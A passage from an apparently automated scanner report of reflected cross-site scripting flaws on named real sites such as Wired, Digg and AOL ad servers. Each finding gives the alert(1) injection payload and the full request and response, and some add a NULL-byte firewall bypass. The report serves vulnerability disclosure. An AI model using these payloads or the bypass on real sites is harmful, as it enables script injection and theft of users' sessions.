GET /adiframe/3.0/5113.1fd1bb"><script>alert(1)</script>795dc3822fb/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1fd1bb"><script>alert(1)</script>795dc3822fb/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.92. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b81"><script>alert(1)</script>d7b136c3cd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794d3b81"><script>alert(1)</script>d7b136c3cd7/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794d3b81"><script>alert(1)</script>d7b136c3cd7/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.93. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc8ef"><script>alert(1)</script>2480ed798e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0cc8ef"><script>alert(1)</script>2480ed798e2/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0cc8ef"><script>alert(1)</script>2480ed798e2/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.94. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0eb1"><script>alert(1)</script>6026b3de44a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1e0eb1"><script>alert(1)</script>6026b3de44a/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1e0eb1"><script>alert(1)</script>6026b3de44a/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.95. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee20a"><script>alert(1)</script>b927cf1665f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/sizeee20a"><script>alert(1)</script>b927cf1665f=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/sizeee20a"><script>alert(1)</script>b927cf1665f=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956;adiframe=y">
...[SNIP]...

1.96. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc670"><script>alert(1)</script>e55e2aeba0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956&fc670"><script>alert(1)</script>e55e2aeba0c=1 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 353

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956&fc670"><script>alert(1)</script>e55e2aeba0c=1;adiframe=y">
...[SNIP]...

1.97. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed98"><script>alert(1)</script>b265eeb37a0 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=3815709563ed98"><script>alert(1)</script>b265eeb37a0 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=3815709563ed98"><script>alert(1)</script>b265eeb37a0;adiframe=y">
...[SNIP]...

1.98. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boxing.fanhouse.com
Path:   /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96dad"-alert(1)-"01208aaeb95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?96dad"-alert(1)-"01208aaeb95=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:39:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sun, 22-Nov-2009 01:39:25 GMT; path=/
Keep-Alive: timeout=5, max=999965
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 119988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
xgo = true;
s_265.prop1="Boxing";
s_265.prop2="Article";
s_265.prop9="bsd:19654671";
s_265.prop12="http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?96dad"-alert(1)-"01208aaeb95=1";
s_265.prop17="pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma";
s_265.prop19="lem-satterfield";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code
...[SNIP]...

1.99. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boxing.fanhouse.com
Path:   /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6954"><script>alert(1)</script>40c64d26d0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:39:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sun, 22-Nov-2009 01:39:16 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 120062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1"/>
...[SNIP]...

1.100. http://cde.cerosmedia.com/WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cde.cerosmedia.com
Path:   /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bdf</script><script>alert(1)</script>fbf4f8394ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde?74bdf</script><script>alert(1)</script>fbf4f8394ac=1 HTTP/1.1
Host: cde.cerosmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:52:51 GMT
Server: Apache
Set-Cookie: CerosStats=aWR8ZGExNDc5NmJkM2Y1N2EyZDVjMDA0MTY5OGE3YzU5NGQ%3D; expires=Thu, 19-Nov-2020 01:52:51 GMT; path=/; domain=.cerosmedia.com
Content-Length: 7488
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
               
       <meta h
...[SNIP]...
osmedia.com%2FWIRED_MAY_SAMPLER%2F1S4bb37141d5ff4012.cde%2Fpage%2F"); so.addVariable("pathToXML", "pages%2FWIR_260310%2Fxml%2Frhino.xml%3Fcb%3D6246e1bbae81f8201d17e74c48200238"); so.addVariable("ceros_74bdf</script><script>alert(1)</script>fbf4f8394ac", "1"); so.addParam("scale", "noscale"); so.addParam("allowScriptAccess", "always"); so.addParam("swLiveConnect", "true"); so.write("flashcontent"); /* ]]>
...[SNIP]...

1.101. http://click.linksynergy.com/fs-bin/click [offerid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 12c1f<script>alert(1)</script>7027a7ea3c was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=/1Vwg7V501c&subid=&offerid=12c1f<script>alert(1)</script>7027a7ea3c&type=10&tmpid=3909&RD_PARM1=http://itunes.apple.com/us/app/wired-magazine/id373903654%3fmt=8 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.wired.com/magazine/?intcid=gnav
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: click.linksynergy.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 257
Date: Mon, 22 Nov 2010 01:34:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "12c1f<script>alert(1)</script>7027a7ea3c"
</body>
...[SNIP]...

1.102. http://comments.wired.com/json.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comments.wired.com
Path:   /json.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cdaef<script>alert(1)</script>0e666a83707 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEventcdaef<script>alert(1)</script>0e666a83707&eventName=comments_0&markdown=true&limit=10 HTTP/1.1
Host: comments.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Server: Spezserver/0.1
Vary: Accept-Encoding
X-N: S
Date: Mon, 22 Nov 2010 01:40:43 GMT
Connection: close
Content-Length: 3429

commentBroker.handleEventcdaef<script>alert(1)</script>0e666a83707("%7B%22success%22%3A%20true%2C%20%22hash%22%3A%20%22%22%2C%20%22type%22%3A%20%22responseWrapper%22%2C%20%22responses%22%3A%20%5B%7B%22commentEndIdx%22%3A%2011%2C%20%22pageNum%22%3A%200%2C%20%22comment
...[SNIP]...

1.103. http://comments.wired.com/json.js [eventName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comments.wired.com
Path:   /json.js

Issue detail

The value of the eventName request parameter is copied into the HTML document as plain text between tags. The payload c37f4<script>alert(1)</script>76a0335a7e3 was submitted in the eventName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEvent&eventName=comments_0c37f4<script>alert(1)</script>76a0335a7e3&markdown=true&limit=10 HTTP/1.1
Host: comments.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Server: Spezserver/0.1
Vary: Accept-Encoding
X-N: S
Date: Mon, 22 Nov 2010 01:40:48 GMT
Connection: close
Content-Length: 3429

commentBroker.handleEvent("%7B%22success%22%3A%20true%2C%20%22hash%22%3A%20%22%22%2C%20%22type%22%3A%20%22responseWrapper%22%2C%20%22responses%22%3A%20%5B%7B%22commentEndIdx%22%3A%2011%2C%20%22pageNum
...[SNIP]...
2%3A%20%22/culture/art/multimedia/2008/07/gallery_faves_food%22%2C%20%22type%22%3A%20%22document%22%7D%2C%20%22type%22%3A%20%22commentPage%22%7D%5D%2C%20%22statusMessage%22%3A%20%22%22%7D", "comments_0c37f4<script>alert(1)</script>76a0335a7e3");

1.104. http://digg.com/tools/diggthis.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fc71"><script>alert(1)</script>f888a9f8a9b was submitted in the REST URL parameter 1. This input was echoed as 7fc71"><script>alert(1)</script>f888a9f8a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools%007fc71"><script>alert(1)</script>f888a9f8a9b/diggthis.js HTTP/1.1
Accept: */*
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: digg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Tue, 21-Dec-2010 20:21:32 GMT; path=/; domain=digg.com
Set-Cookie: d=cbb3a58acc522768ca90b50d410773b05e71e4a4425c0014e669d73756b805c5; expires=Sat, 21-Nov-2020 06:29:12 GMT; path=/; domain=.digg.com
X-Digg-Time: D=237512 10.2.128.255
Vary: Accept-Encoding
nnCoection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15352

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%007fc71"><script>alert(1)</script>f888a9f8a9b/diggthis.js.rss">
...[SNIP]...

1.105. http://digg.com/tools/diggthis.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dc217"><script>alert(1)</script>304ac110a42 was submitted in the REST URL parameter 2. This input was echoed as dc217"><script>alert(1)</script>304ac110a42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/diggthis.js%00dc217"><script>alert(1)</script>304ac110a42 HTTP/1.1
Accept: */*
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: digg.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Tue, 21-Dec-2010 20:21:34 GMT; path=/; domain=digg.com
Set-Cookie: d=a4a09480f533f377242f4d345795ad8e3472286938e1ba81d5407416c04060a3; expires=Sat, 21-Nov-2020 06:29:14 GMT; path=/; domain=.digg.com
X-Digg-Time: D=465202 10.2.130.26
Vary: Accept-Encoding
Cneonction: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15351

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00dc217"><script>alert(1)</script>304ac110a42.rss">
...[SNIP]...

1.106. http://ideabank.opendns.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ideabank.opendns.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e1f"><script>alert(1)</script>2b044539dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

